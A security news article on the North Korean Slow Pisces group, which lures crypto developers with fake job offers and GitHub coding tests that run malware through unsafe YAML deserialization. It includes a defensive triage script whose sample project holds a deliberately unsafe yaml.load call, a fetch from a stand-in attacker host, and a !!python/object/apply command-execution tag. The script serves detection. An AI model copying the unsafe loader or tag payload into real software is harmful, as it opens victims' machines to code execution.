Slow Pisces Tricks Crypto Devs With Fake Job Offers

A North Korean state-sponsored hacking group tracked as Slow Pisces is tricking cryptocurrency developers into running malicious code disguised as a coding challenge for a job application.

In a rush? Here are the quick facts:

  • The payload is served only after the attackers' server has checked the victim's location and system configuration.
  • The payload runs in memory rather than being written to disk.
  • RN Stealer collects usernames, installed apps, and directory listings from macOS systems.

The group, also tracked as Jade Sleet or TraderTraitor, is blamed for more than $1 billion in stolen crypto assets and continues to run sophisticated campaigns that generate income for the DPRK regime.

According to researchers at Palo Alto Networks' Unit 42, Slow Pisces operators contact developers on LinkedIn while posing as recruiters. After some conversation, they send a fake job description as a PDF. If the target applies, they receive a coding test built around a "real project" hosted on GitHub, and that repository carries the malware.

These projects look legitimate: they fetch data from real sites such as Wikipedia. Hidden among the configured data sources, however, is one domain the attackers control. Its server hands out the malicious payload only after confirming the target's location and system details, so sandboxes and researchers that do not match the profile see nothing but benign data.

Rather than an obviously malicious construct, such as calling eval() on fetched data, which scanners flag readily, the attackers relied on YAML deserialization. The project parses a configuration document fetched from the attacker's server with an unsafe YAML loader (in Python, PyYAML's yaml.load with any loader other than SafeLoader), and such a loader can instantiate arbitrary objects from the document and therefore execute code. The dangerous logic thus lives in what looks like a harmless settings file, and it is hard to spot without knowing to look for it.
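The two checks the previous paragraphs suggest can be automated before a take-home project is ever run: list every host the code talks to and compare it with the hosts the challenge claims to use, and flag unsafe YAML deserialization. The script below is an added example written for this article, not Unit 42's tooling and not the attackers' code. It uses only the Python standard library; the file names, the host market-feed.example, and the repository contents are constructed to stand in for a recruiter's "real project".

```python
"""Offline triage of a 'coding challenge' repository before running it.

Added example: not Unit 42's tooling and not Slow Pisces' code.
Two checks, standard library only:
  1. Which hosts does the project contact?  Every http(s) URL literal in
     source and config is reduced to its host and compared with the hosts
     the challenge claims to use.
  2. Does it deserialize remote data unsafely?  yaml.load with Loader,
     FullLoader or UnsafeLoader (or no Loader at all, which PyYAML < 6
     silently resolved to FullLoader) and !!python/ tags in YAML text.
File names, hosts and project contents below are constructed.
"""
import ast
import re
from urllib.parse import urlparse

SAFE_YAML_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}
URL_RE = re.compile(r"https?://[^\s'\"<>)\]]+")
PYTHON_TAG_RE = re.compile(r"!!python/[\w./:]+")


def _loader_name(call: ast.Call):
    """Name of the Loader passed to yaml.load(...), or None when absent."""
    candidates = [kw.value for kw in call.keywords if kw.arg == "Loader"]
    if len(call.args) >= 2:            # positional form: yaml.load(text, Loader)
        candidates.append(call.args[1])
    for node in candidates:
        if isinstance(node, ast.Attribute):
            return node.attr           # yaml.Loader -> "Loader"
        if isinstance(node, ast.Name):
            return node.id
        return "<expression>"
    return None


def find_unsafe_yaml_calls(source: str) -> list[tuple[int, str]]:
    """(lineno, reason) for each yaml.* call able to build arbitrary objects."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not isinstance(node.func, ast.Attribute):
            continue
        obj, fn = node.func.value, node.func.attr
        if not (isinstance(obj, ast.Name) and obj.id == "yaml"):
            continue                   # ignore json.load(), pickle.load(), ...
        if fn in ("unsafe_load", "unsafe_load_all"):
            findings.append((node.lineno, f"yaml.{fn}"))
        elif fn in ("load", "load_all"):
            loader = _loader_name(node)
            if loader is None:
                findings.append((node.lineno, f"yaml.{fn} with no Loader (FullLoader on PyYAML < 6)"))
            elif loader not in SAFE_YAML_LOADERS:
                findings.append((node.lineno, f"yaml.{fn} with Loader={loader}"))
    return findings


def extract_hosts(text: str) -> set[str]:
    """Hosts of every http(s) URL literal in a file."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
    return {h for h in hosts if h}


def find_python_tags(yaml_text: str) -> list[str]:
    """PyYAML-specific tags that only an unsafe loader will honour."""
    return PYTHON_TAG_RE.findall(yaml_text)


def triage_project(files: dict[str, str], expected_hosts: set[str]) -> dict:
    """Run both checks over {path: contents} and return a report."""
    report = {"unsafe_yaml_calls": [], "python_tags": [], "unexpected_hosts": set()}
    for path, text in files.items():
        report["unexpected_hosts"] |= extract_hosts(text) - expected_hosts
        if path.endswith(".py"):
            for lineno, reason in find_unsafe_yaml_calls(text):
                report["unsafe_yaml_calls"].append(f"{path}:{lineno}: {reason}")
        elif path.endswith((".yml", ".yaml")):
            report["python_tags"] += [f"{path}: {t}" for t in find_python_tags(text)]
    return report


# Constructed stand-in for a challenge repo: a fetcher with one extra host
# and an unsafe loader, a safe settings parser, and a YAML file showing the
# kind of document a hostile server can return to the unsafe loader.
SAMPLE_PROJECT = {
    "fetch.py": (
        "import requests\n"
        "import yaml\n"
        "SOURCES = [\n"
        "    'https://en.wikipedia.org/wiki/Bitcoin',\n"
        "    'https://en.wikipedia.org/wiki/Ethereum',\n"
        "    'https://market-feed.example/api/config',  # hypothetical attacker host\n"
        "]\n"
        "def load_remote_config(url):\n"
        "    text = requests.get(url, timeout=10).text\n"
        "    return yaml.load(text, Loader=yaml.Loader)  # unsafe: arbitrary objects\n"
    ),
    "settings.py": (
        "import yaml\n"
        "def load_settings(text):\n"
        "    return yaml.load(text, Loader=yaml.SafeLoader)  # safe: plain data only\n"
    ),
    "defaults.yaml": (
        "refresh_seconds: 30\n"
        "pairs: [BTC, ETH]\n"
        "# what a hostile server can return to a yaml.Loader-based parser:\n"
        "hook: !!python/object/apply:subprocess.check_output [['echo', 'pwned']]\n"
    ),
}
EXPECTED_HOSTS = {"en.wikipedia.org"}   # what the challenge says it uses

if __name__ == "__main__":
    for key, value in triage_project(SAMPLE_PROJECT, EXPECTED_HOSTS).items():
        print(key, sorted(value) if isinstance(value, set) else value)
```

Anything in `unexpected_hosts` deserves an explanation from the "recruiter" before the project is run, and a `yaml.load` with a non-safe loader applied to remote content is reason enough to stop. The fix for the flagged call is `yaml.safe_load(text)` (or `Loader=yaml.SafeLoader`), which rejects `!!python/` tags outright.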

Once the payload runs, it stays in memory rather than writing files to disk, and it retrieves further stages named RN Loader and RN Stealer. RN Loader collects basic system data and reports it to the operators, while RN Stealer gathers more sensitive information, such as usernames, installed applications, and directory listings, from macOS systems.

Palo Alto Networks reported the malicious LinkedIn and GitHub accounts. Both platforms responded:

“GitHub and LinkedIn removed these malicious accounts for violating our respective terms of service […] We continue to evolve and improve our processes and encourage our customers and members to report any suspicious activity.”

Security experts recommend that developers treat unsolicited coding challenges with suspicion, review every URL a take-home project contacts before running it, and run such projects only in an isolated environment rather than on a workstation that holds wallet keys or signing credentials.
